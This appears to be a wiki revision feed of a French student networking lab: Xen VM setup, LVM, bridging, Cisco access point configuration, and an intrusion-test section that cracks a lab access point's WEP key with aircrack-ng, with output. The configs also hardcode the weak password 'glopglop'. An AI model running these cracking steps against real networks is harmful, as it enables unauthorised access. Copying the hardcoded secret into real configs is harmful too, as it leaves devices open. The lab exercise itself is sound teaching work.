		<summary type="html">&lt;p&gt;Yhaloua1 : /* Tests d'intrusion */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Installation de la machine virtuelle ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Connexion sur le disque de virtualisation :'''&lt;br /&gt;
 su -&lt;br /&gt;
 ssh -4 capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
'''Installation dans la machine virtuelle Xen'''&lt;br /&gt;
&lt;br /&gt;
Création de la machine virtuelle :&lt;br /&gt;
 xen-create-image --hostname=Toad --ip=193.48.57.173 --gateway=193.48.57.174 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
Veiller à noter le mot de passe de la MV à cette étape. Celui-ci peut-être retrouvé à l'aide de la commande :&lt;br /&gt;
 tail -f /var/log/xen-tools/Toad.log&lt;br /&gt;
Vérifier la création de la MV en se rendant sur les répertoires:&lt;br /&gt;
 ls /etc/xen&lt;br /&gt;
 ls /usr/local/xen&lt;br /&gt;
Pour les disques : configuration RAID 5&lt;br /&gt;
Administration de volume logique :&lt;br /&gt;
 lvcreate -L1G -n Toad1&lt;br /&gt;
 lvcreate -L1G -n Toad2&lt;br /&gt;
 lvcreate -L1G -n Toad3&lt;br /&gt;
 lvcreate -L1G -n Toad4&lt;br /&gt;
&lt;br /&gt;
Les volumes logiques sont par défaut de 1GiB.&lt;br /&gt;
Augmenter la taille des volumes logiques:&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad1&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad2&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad3&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Vérifier avec :&lt;br /&gt;
 lvdisplay&lt;br /&gt;
&lt;br /&gt;
Créer un système de fichiers étendu :&lt;br /&gt;
 mke2fs /dev/virtual/Toad1&lt;br /&gt;
 mke2fs /dev/virtual/Toad2&lt;br /&gt;
 mke2fs /dev/virtual/Toad3&lt;br /&gt;
 mke2fs /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Création et modification du fichier de configuration :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
 vim Toad.cfg&lt;br /&gt;
&lt;br /&gt;
Dans Networking, supprimer l'@ IP et définir : &lt;br /&gt;
 bridge = IMA2a5&lt;br /&gt;
Pour prenndre en compte les disques créés dans la MV, dans '''disk''', ajouter :&lt;br /&gt;
 'phy:/dev/virtual/Toad1, xvda3, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad2, xvda4, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad3, xvda5, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad4, xvda6, w'&lt;br /&gt;
&lt;br /&gt;
Lancer la MV avec la commande :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que la MV est démarrée avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la console de la MV :&lt;br /&gt;
 xen console Toad&lt;br /&gt;
Avec login : root et password : celui qui a été noté au début.&lt;br /&gt;
&lt;br /&gt;
Si besoin de changer le mot de passe :&lt;br /&gt;
 passwd root&lt;br /&gt;
&lt;br /&gt;
'''Configuration de la machine virtuelle'''&lt;br /&gt;
&lt;br /&gt;
Installer les packages dont nous avons besoin :&lt;br /&gt;
 apt-get update&lt;br /&gt;
&lt;br /&gt;
'''Configuration réseau'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Configuration ssh'''&lt;br /&gt;
&lt;br /&gt;
== Passerelle capbreton ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une passerelle doit être mise en place sur capbreton, pour relier les VM.&lt;br /&gt;
Il faut modifier le fichier interfaces :&lt;br /&gt;
&lt;br /&gt;
 nano /etc/network/interfaces&lt;br /&gt;
On identifie les ports ethernet sur lesquels nous sommes câblés :&lt;br /&gt;
 ethtool -p ether n&lt;br /&gt;
Avec n numéro de port. &lt;br /&gt;
&lt;br /&gt;
Nous sommes câblés sur les ports suivants :&lt;br /&gt;
- ether7 : fibré pour aller jusqu'au routeur 6509&lt;br /&gt;
- ether6 : fibré pour aller jusqu'au routeur 9200&lt;br /&gt;
&lt;br /&gt;
Configurer la passerelle comme ci-dessous :&lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth6 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
&lt;br /&gt;
Déconfigurer, puis configurer l'interface réseau :&lt;br /&gt;
 ifdown IMA2a5&lt;br /&gt;
 ifup IMAa5&lt;br /&gt;
&lt;br /&gt;
Vérifier la configuration :&lt;br /&gt;
 brctl show&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés wifi ==&lt;br /&gt;
&lt;br /&gt;
'''Réinitialisation des paramètres de la borne wifi :'''&lt;br /&gt;
 erase startup config&lt;br /&gt;
 reload&lt;br /&gt;
&lt;br /&gt;
'''Configuration de base :'''&lt;br /&gt;
 ap&amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
'''Configuration du nom d'hôte :'''&lt;br /&gt;
 ap(config)#hostname SE2A5-AP1&lt;br /&gt;
&lt;br /&gt;
'''Accès ssh :'''&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
'''Sécurisation des accès :'''&lt;br /&gt;
 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
&lt;br /&gt;
'''VLAN 173'''&lt;br /&gt;
 aaa authentication login EAP_TOAD group RADIUS_TOAD&lt;br /&gt;
 radius-server host 193.48.57.173 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
 aaa group server radius RADIUS_TOAD&lt;br /&gt;
 server 193.48.57.173 auth-port 1812 acct-port 1813&lt;br /&gt;
 exit&lt;br /&gt;
 dot11 ssid TOAD1&lt;br /&gt;
 mbssid guest-mode&lt;br /&gt;
 vlan 173&lt;br /&gt;
 authentication open eap EAP_TOAD&lt;br /&gt;
 authentication network-eap EAP_TOAD&lt;br /&gt;
 authentication key-management wpa&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface g0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio 0&lt;br /&gt;
 no shutdown&lt;br /&gt;
 encryption vlan 173 mode ciphers aes-ccm tkip&lt;br /&gt;
 mbssid&lt;br /&gt;
 ssid TOAD1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration de la liaison routeur 3500 vers 9200 ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Afficher la liste des interfaces du routeur 3500 et leurs états :&lt;br /&gt;
 sh ip interface brief&lt;br /&gt;
On constate que le port G0/39 est désactivé pour le moment.&lt;br /&gt;
Il faut le relier au routeur 3500 via le VLAN 532.&lt;br /&gt;
&lt;br /&gt;
'''Configuration :'''&lt;br /&gt;
 configure t&lt;br /&gt;
 interface G0/39&lt;br /&gt;
 switchport access vlan 532&lt;br /&gt;
 switchport mode access&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
'''Cassage de clef WEP d'un point d'accès WiFi'''&lt;br /&gt;
- Brancher une clef wifi sur le PC&lt;br /&gt;
&lt;br /&gt;
- Installer le paquet aircrack.ng&lt;br /&gt;
&lt;br /&gt;
- On peut lister les interfaces disponibles, en activant le mode moniteur de la carte réseau :&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
- Passer la carte WiFi en mode moniteur, espion du réseau sans fil :&lt;br /&gt;
 airmon-ng start wlan0mon &lt;br /&gt;
wlan0mon est le nouveau nom de la carte réseau donné par défaut car le précédent est considéré comme trop long par la machine.&lt;br /&gt;
&lt;br /&gt;
- Obtenir les trames WiFi sur tous les canaux :&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
- Notes le SSID de la machine à attaquer, ici cracotte03 : 04:DA:D2:9C:50:53&lt;br /&gt;
- Visulaiser les informations de cracotte03 : &lt;br /&gt;
 airodump-ng --channel 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
- Récupérer dans un fichier .cap toutes les données qui transitent sur le channel 3, uniquement les paquets échangés avec cracotte03 :&lt;br /&gt;
 airodump-ng -w lcrack -c 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
J'attends qu'il y ai environ 30 000 trames de volées, ce processus prend un peu de temps.&lt;br /&gt;
- Lancer le décryptage de la clef WEP : &lt;br /&gt;
 aircrack-ng lcrack-01.cap&lt;br /&gt;
Résultat :&lt;br /&gt;
  &lt;br /&gt;
                                                                        [00:00:00] Tested 813 keys (got 74481 IVs)&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/ 17   F1(96512) E7(85504) BD(84992) 6F(84736) F2(83968) FA(83712) 12(83456) 0E(82688) C8(82176) 6A(81920) 70(81664) 11(81408) 95(81408) E9(81408) 75(81152) &lt;br /&gt;
    1    0/  1   8E(105472) 34(86016) B3(84480) 54(84224) 2A(83456) B9(83456) 87(82688) 06(82432) 64(82432) 65(82176) 21(81920) 8D(81664) 61(81408) 2F(81152) 3C(81152) &lt;br /&gt;
    2    5/  2   7E(83968) 0E(82432) BF(82432) A2(82176) 0A(81920) 9C(81920) A8(81664) DF(81664) E2(81664) A7(81408) B4(81408) 33(80896) 58(80896) 90(80640) 16(80384) &lt;br /&gt;
    3   17/  3   5B(80896) B2(80640) 5A(80384) B1(80384) C4(80384) F6(79616) 03(79360) 33(79360) DA(79360) 73(79104) 9E(79104) 30(78848) 86(78848) AD(78848) D6(78848) &lt;br /&gt;
    4    0/  1   71(107008) 8D(86528) 03(83712) 7A(83712) 5E(83200) AF(82944) 50(82688) CF(82688) 54(82432) C0(82432) 21(82176) BE(81920) CB(81920) 1A(81664) B5(81408) &lt;br /&gt;
        KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:09:99:99:99 ] &lt;br /&gt;
        Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
On constate que 813 clef ont été testées avant de trouver la bonne.&lt;br /&gt;
&lt;br /&gt;
'''Cassage de mot de passe WPA-PSK'''&lt;/div&gt;</summary>
		<author><name>Yhaloua1</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56356</id>
		<title>TP sysres IMA2a5 2021/2022 G13</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56356"/>
				<updated>2021-11-12T11:07:26Z</updated>
		
		<summary type="html">&lt;p&gt;Yhaloua1 : /* Tests d'intrusion */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Installation de la machine virtuelle ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Connexion sur le disque de virtualisation :'''&lt;br /&gt;
 su -&lt;br /&gt;
 ssh -4 capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
'''Installation dans la machine virtuelle Xen'''&lt;br /&gt;
&lt;br /&gt;
Création de la machine virtuelle :&lt;br /&gt;
 xen-create-image --hostname=Toad --ip=193.48.57.173 --gateway=193.48.57.174 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
Veiller à noter le mot de passe de la MV à cette étape. Celui-ci peut-être retrouvé à l'aide de la commande :&lt;br /&gt;
 tail -f /var/log/xen-tools/Toad.log&lt;br /&gt;
Vérifier la création de la MV en se rendant sur les répertoires:&lt;br /&gt;
 ls /etc/xen&lt;br /&gt;
 ls /usr/local/xen&lt;br /&gt;
Pour les disques : configuration RAID 5&lt;br /&gt;
Administration de volume logique :&lt;br /&gt;
 lvcreate -L1G -n Toad1&lt;br /&gt;
 lvcreate -L1G -n Toad2&lt;br /&gt;
 lvcreate -L1G -n Toad3&lt;br /&gt;
 lvcreate -L1G -n Toad4&lt;br /&gt;
&lt;br /&gt;
Les volumes logiques sont par défaut de 1GiB.&lt;br /&gt;
Augmenter la taille des volumes logiques:&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad1&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad2&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad3&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Vérifier avec :&lt;br /&gt;
 lvdisplay&lt;br /&gt;
&lt;br /&gt;
Créer un système de fichiers étendu :&lt;br /&gt;
 mke2fs /dev/virtual/Toad1&lt;br /&gt;
 mke2fs /dev/virtual/Toad2&lt;br /&gt;
 mke2fs /dev/virtual/Toad3&lt;br /&gt;
 mke2fs /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Création et modification du fichier de configuration :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
 vim Toad.cfg&lt;br /&gt;
&lt;br /&gt;
Dans Networking, supprimer l'@ IP et définir : &lt;br /&gt;
 bridge = IMA2a5&lt;br /&gt;
Pour prenndre en compte les disques créés dans la MV, dans '''disk''', ajouter :&lt;br /&gt;
 'phy:/dev/virtual/Toad1, xvda3, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad2, xvda4, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad3, xvda5, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad4, xvda6, w'&lt;br /&gt;
&lt;br /&gt;
Lancer la MV avec la commande :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que la MV est démarrée avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la console de la MV :&lt;br /&gt;
 xen console Toad&lt;br /&gt;
Avec login : root et password : celui qui a été noté au début.&lt;br /&gt;
&lt;br /&gt;
Si besoin de changer le mot de passe :&lt;br /&gt;
 passwd root&lt;br /&gt;
&lt;br /&gt;
'''Configuration de la machine virtuelle'''&lt;br /&gt;
&lt;br /&gt;
Installer les packages dont nous avons besoin :&lt;br /&gt;
 apt-get update&lt;br /&gt;
&lt;br /&gt;
'''Configuration réseau'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Configuration ssh'''&lt;br /&gt;
&lt;br /&gt;
== Passerelle capbreton ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une passerelle doit être mise en place sur capbreton, pour relier les VM.&lt;br /&gt;
Il faut modifier le fichier interfaces :&lt;br /&gt;
&lt;br /&gt;
 nano /etc/network/interfaces&lt;br /&gt;
On identifie les ports ethernet sur lesquels nous sommes câblés :&lt;br /&gt;
 ethtool -p ether n&lt;br /&gt;
Avec n numéro de port. &lt;br /&gt;
&lt;br /&gt;
Nous sommes câblés sur les ports suivants :&lt;br /&gt;
- ether7 : fibré pour aller jusqu'au routeur 6509&lt;br /&gt;
- ether6 : fibré pour aller jusqu'au routeur 9200&lt;br /&gt;
&lt;br /&gt;
Configurer la passerelle comme ci-dessous :&lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth6 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
&lt;br /&gt;
Déconfigurer, puis configurer l'interface réseau :&lt;br /&gt;
 ifdown IMA2a5&lt;br /&gt;
 ifup IMAa5&lt;br /&gt;
&lt;br /&gt;
Vérifier la configuration :&lt;br /&gt;
 brctl show&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés wifi ==&lt;br /&gt;
&lt;br /&gt;
'''Réinitialisation des paramètres de la borne wifi :'''&lt;br /&gt;
 erase startup config&lt;br /&gt;
 reload&lt;br /&gt;
&lt;br /&gt;
'''Configuration de base :'''&lt;br /&gt;
 ap&amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
'''Configuration du nom d'hôte :'''&lt;br /&gt;
 ap(config)#hostname SE2A5-AP1&lt;br /&gt;
&lt;br /&gt;
'''Accès ssh :'''&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
'''Sécurisation des accès :'''&lt;br /&gt;
 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
&lt;br /&gt;
'''VLAN 173'''&lt;br /&gt;
 aaa authentication login EAP_TOAD group RADIUS_TOAD&lt;br /&gt;
 radius-server host 193.48.57.173 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
 aaa group server radius RADIUS_TOAD&lt;br /&gt;
 server 193.48.57.173 auth-port 1812 acct-port 1813&lt;br /&gt;
 exit&lt;br /&gt;
 dot11 ssid TOAD1&lt;br /&gt;
 mbssid guest-mode&lt;br /&gt;
 vlan 173&lt;br /&gt;
 authentication open eap EAP_TOAD&lt;br /&gt;
 authentication network-eap EAP_TOAD&lt;br /&gt;
 authentication key-management wpa&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface g0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio 0&lt;br /&gt;
 no shutdown&lt;br /&gt;
 encryption vlan 173 mode ciphers aes-ccm tkip&lt;br /&gt;
 mbssid&lt;br /&gt;
 ssid TOAD1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration de la liaison routeur 3500 vers 9200 ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Afficher la liste des interfaces du routeur 3500 et leurs états :&lt;br /&gt;
 sh ip interface brief&lt;br /&gt;
On constate que le port G0/39 est désactivé pour le moment.&lt;br /&gt;
Il faut le relier au routeur 3500 via le VLAN 532.&lt;br /&gt;
&lt;br /&gt;
'''Configuration :'''&lt;br /&gt;
 configure t&lt;br /&gt;
 interface G0/39&lt;br /&gt;
 switchport access vlan 532&lt;br /&gt;
 switchport mode access&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
'''Cassage de clef WEP d'un point d'accès WiFi'''&lt;br /&gt;
- Brancher une clef wifi sur le PC&lt;br /&gt;
- Installer le paquet aircrack.ng&lt;br /&gt;
- On peut lister les interfaces disponibles, en activant le mode moniteur de la carte réseau :&lt;br /&gt;
 airmon-ng&lt;br /&gt;
- Passer la carte WiFi en mode moniteur, espion du réseau sans fil :&lt;br /&gt;
 airmon-ng start wlan0mon &lt;br /&gt;
wlan0mon est le nouveau nom de la carte réseau donné par défaut car le précédent est considéré comme trop long par la machine.&lt;br /&gt;
&lt;br /&gt;
- Obtenir les trames WiFi sur tous les canaux :&lt;br /&gt;
 airodump --encrypt wep wlan0mon&lt;br /&gt;
- Notes le SSID de la machine à attaquer, ici cracotte03 : 04:DA:D2:9C:50:53&lt;br /&gt;
- Visulaiser les informations de cracotte03 : &lt;br /&gt;
 airodump-ng --channel 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
- Récupérer dans un fichier .cap toutes les données qui transitent sur le channel 3, uniquement les paquets échangés avec cracotte03 :&lt;br /&gt;
 airodump-ng -w lcrack -c 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
J'attends qu'il y ai environ 30 000 trames de volées, ce processus prend un peu de temps.&lt;br /&gt;
- Lancer le décryptage de la clef WEP : &lt;br /&gt;
 aircrack-ng lcrack-01.cap&lt;br /&gt;
Résultat :&lt;br /&gt;
  &lt;br /&gt;
                                                                        [00:00:00] Tested 813 keys (got 74481 IVs)&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/ 17   F1(96512) E7(85504) BD(84992) 6F(84736) F2(83968) FA(83712) 12(83456) 0E(82688) C8(82176) 6A(81920) 70(81664) 11(81408) 95(81408) E9(81408) 75(81152) &lt;br /&gt;
    1    0/  1   8E(105472) 34(86016) B3(84480) 54(84224) 2A(83456) B9(83456) 87(82688) 06(82432) 64(82432) 65(82176) 21(81920) 8D(81664) 61(81408) 2F(81152) 3C(81152) &lt;br /&gt;
    2    5/  2   7E(83968) 0E(82432) BF(82432) A2(82176) 0A(81920) 9C(81920) A8(81664) DF(81664) E2(81664) A7(81408) B4(81408) 33(80896) 58(80896) 90(80640) 16(80384) &lt;br /&gt;
    3   17/  3   5B(80896) B2(80640) 5A(80384) B1(80384) C4(80384) F6(79616) 03(79360) 33(79360) DA(79360) 73(79104) 9E(79104) 30(78848) 86(78848) AD(78848) D6(78848) &lt;br /&gt;
    4    0/  1   71(107008) 8D(86528) 03(83712) 7A(83712) 5E(83200) AF(82944) 50(82688) CF(82688) 54(82432) C0(82432) 21(82176) BE(81920) CB(81920) 1A(81664) B5(81408) &lt;br /&gt;
        KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:09:99:99:99 ] &lt;br /&gt;
        Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
On constate que 813 clef ont été testées avant de trouver la bonne.&lt;br /&gt;
&lt;br /&gt;
'''Cassage de mot de passe WPA-PSK'''&lt;/div&gt;</summary>
		<author><name>Yhaloua1</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56354</id>
		<title>TP sysres IMA2a5 2021/2022 G13</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56354"/>
				<updated>2021-11-12T11:02:25Z</updated>
		
		<summary type="html">&lt;p&gt;Yhaloua1 : /* Tests d'intrusion */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Installation de la machine virtuelle ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Connexion sur le disque de virtualisation :'''&lt;br /&gt;
 su -&lt;br /&gt;
 ssh -4 capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
'''Installation dans la machine virtuelle Xen'''&lt;br /&gt;
&lt;br /&gt;
Création de la machine virtuelle :&lt;br /&gt;
 xen-create-image --hostname=Toad --ip=193.48.57.173 --gateway=193.48.57.174 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
Veiller à noter le mot de passe de la MV à cette étape. Celui-ci peut-être retrouvé à l'aide de la commande :&lt;br /&gt;
 tail -f /var/log/xen-tools/Toad.log&lt;br /&gt;
Vérifier la création de la MV en se rendant sur les répertoires:&lt;br /&gt;
 ls /etc/xen&lt;br /&gt;
 ls /usr/local/xen&lt;br /&gt;
Pour les disques : configuration RAID 5&lt;br /&gt;
Administration de volume logique :&lt;br /&gt;
 lvcreate -L1G -n Toad1&lt;br /&gt;
 lvcreate -L1G -n Toad2&lt;br /&gt;
 lvcreate -L1G -n Toad3&lt;br /&gt;
 lvcreate -L1G -n Toad4&lt;br /&gt;
&lt;br /&gt;
Les volumes logiques sont par défaut de 1GiB.&lt;br /&gt;
Augmenter la taille des volumes logiques:&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad1&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad2&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad3&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Vérifier avec :&lt;br /&gt;
 lvdisplay&lt;br /&gt;
&lt;br /&gt;
Créer un système de fichiers étendu :&lt;br /&gt;
 mke2fs /dev/virtual/Toad1&lt;br /&gt;
 mke2fs /dev/virtual/Toad2&lt;br /&gt;
 mke2fs /dev/virtual/Toad3&lt;br /&gt;
 mke2fs /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Création et modification du fichier de configuration :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
 vim Toad.cfg&lt;br /&gt;
&lt;br /&gt;
Dans Networking, supprimer l'@ IP et définir : &lt;br /&gt;
 bridge = IMA2a5&lt;br /&gt;
Pour prenndre en compte les disques créés dans la MV, dans '''disk''', ajouter :&lt;br /&gt;
 'phy:/dev/virtual/Toad1, xvda3, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad2, xvda4, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad3, xvda5, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad4, xvda6, w'&lt;br /&gt;
&lt;br /&gt;
Lancer la MV avec la commande :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que la MV est démarrée avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la console de la MV :&lt;br /&gt;
 xen console Toad&lt;br /&gt;
Avec login : root et password : celui qui a été noté au début.&lt;br /&gt;
&lt;br /&gt;
Si besoin de changer le mot de passe :&lt;br /&gt;
 passwd root&lt;br /&gt;
&lt;br /&gt;
'''Configuration de la machine virtuelle'''&lt;br /&gt;
&lt;br /&gt;
Installer les packages dont nous avons besoin :&lt;br /&gt;
 apt-get update&lt;br /&gt;
&lt;br /&gt;
'''Configuration réseau'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Configuration ssh'''&lt;br /&gt;
&lt;br /&gt;
== Passerelle capbreton ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une passerelle doit être mise en place sur capbreton, pour relier les VM.&lt;br /&gt;
Il faut modifier le fichier interfaces :&lt;br /&gt;
&lt;br /&gt;
 nano /etc/network/interfaces&lt;br /&gt;
On identifie les ports ethernet sur lesquels nous sommes câblés :&lt;br /&gt;
 ethtool -p ether n&lt;br /&gt;
Avec n numéro de port. &lt;br /&gt;
&lt;br /&gt;
Nous sommes câblés sur les ports suivants :&lt;br /&gt;
- ether7 : fibré pour aller jusqu'au routeur 6509&lt;br /&gt;
- ether6 : fibré pour aller jusqu'au routeur 9200&lt;br /&gt;
&lt;br /&gt;
Configurer la passerelle comme ci-dessous :&lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth6 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
&lt;br /&gt;
Déconfigurer, puis configurer l'interface réseau :&lt;br /&gt;
 ifdown IMA2a5&lt;br /&gt;
 ifup IMAa5&lt;br /&gt;
&lt;br /&gt;
Vérifier la configuration :&lt;br /&gt;
 brctl show&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés wifi ==&lt;br /&gt;
&lt;br /&gt;
'''Réinitialisation des paramètres de la borne wifi :'''&lt;br /&gt;
 erase startup config&lt;br /&gt;
 reload&lt;br /&gt;
&lt;br /&gt;
'''Configuration de base :'''&lt;br /&gt;
 ap&amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
'''Configuration du nom d'hôte :'''&lt;br /&gt;
 ap(config)#hostname SE2A5-AP1&lt;br /&gt;
&lt;br /&gt;
'''Accès ssh :'''&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
'''Sécurisation des accès :'''&lt;br /&gt;
